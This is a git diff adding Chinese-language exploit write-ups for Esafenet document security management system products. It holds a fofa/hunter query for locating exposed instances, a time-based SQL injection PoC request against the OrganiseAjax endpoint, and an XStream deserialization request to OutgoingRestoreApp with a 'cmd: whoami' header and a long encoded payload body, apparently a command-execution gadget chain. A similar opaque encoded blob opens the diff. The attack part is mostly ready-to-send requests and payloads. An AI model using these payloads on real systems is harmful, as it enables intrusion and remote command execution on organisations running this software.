JBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605271369-7f37d9cd-4ab8-494c-b4fc-471d36be127c.png](./img/RHal_2krZDLiIbZ5/1706605271369-7f37d9cd-4ab8-494c-b4fc-471d36be127c-882324.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ng30d3l71npc5y8s>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..1c91136
--- /dev/null
+++ b/亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` OrganiseAjax`接口的`groupNameSearch`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../OrganiseAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=search&groupNameSearch=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..042b237
--- /dev/null
+++ b/亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统OutgoingRestoreApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/mNluLungjp6mX99D/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-038082.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/OutgoingRestoreApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.31.208:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEH